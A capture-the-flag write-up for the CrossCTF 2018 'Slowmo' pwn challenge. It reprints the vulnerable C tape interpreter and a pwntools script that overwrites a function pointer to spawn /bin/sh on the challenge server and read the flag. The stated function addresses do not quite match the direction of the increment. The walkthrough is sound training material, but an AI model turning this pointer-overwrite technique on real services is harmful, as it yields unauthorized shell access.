CrossCTF_2018: Slowmo

Category: Pwn Points: 444 Description:

What is in this mysterious package? nc ctf.pwn.sg 4005 Creator - amon (@nn_amon)

Write-up

This challenge is fairly basic, with a tinge of fun in manipulating the symbols to overwrite the addresses.

It's even nicer that the source code is provided, so we know that our win condition would be to overwrite dis with dos's address.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

int happy = 0;

void (*indirection)();

char tape[256];

void dis() {
    system("/bin/date");
}

void dos() {
    system("/bin/sh");
}

int main() {
    indirection = dis;
    char * ptr = tape + 128;
    alarm(30);
    char inst;
    while (1) {
        if (happy) {
            for (int i = 0; i < 256; i++) {
                printf("/%02x", tape[i]);
            }
            printf("/\n");
        }
        read(0, &inst, 1);
        switch (inst) {
            case '<':
                ++ptr;
                break;
            case '>':
                --ptr;
                break;
            case '^':
                *ptr += 1;
                break;
            case 'v':
                *ptr -= 1;
                break;
            case '!':
                indirection();
                return 0;
            case '`':
                happy = 1;
        }
    }
}

The key to solving this challenge, is to know just how much you have to increment the addresses and thankfully, we can note that the addresses for both functions are 0x105d0 and 0x105b4 respectively, with a difference of 0x1c or 28. So, just move the ticker to the location of indirection and increment the pointer 28 times!

#! /usr/bin/env python3
##
from pwn import *

with context.local(log_level="critical"):
    t = remote("ctf.pwn.sg", 4005)
    t.send("<" * 128 + "^" * 28 + "!" + "\n" * 5)

t.sendline("cat /home/slowmo/flag")
flag = t.clean(1).decode()
log.success(f"Flag: {flag}")

t.interactive()

Running it gives us,

root@ctf:~# ./solve.py 
[+] Flag: CrossCTF{l1sten_cl0s3_and_d0nt_b33_st00nes}
[*] Switching to interactive mode
$

Therefore, the flag is CrossCTF{l1sten_cl0s3_and_d0nt_b33_st00nes}

results matching ""

    No results matching ""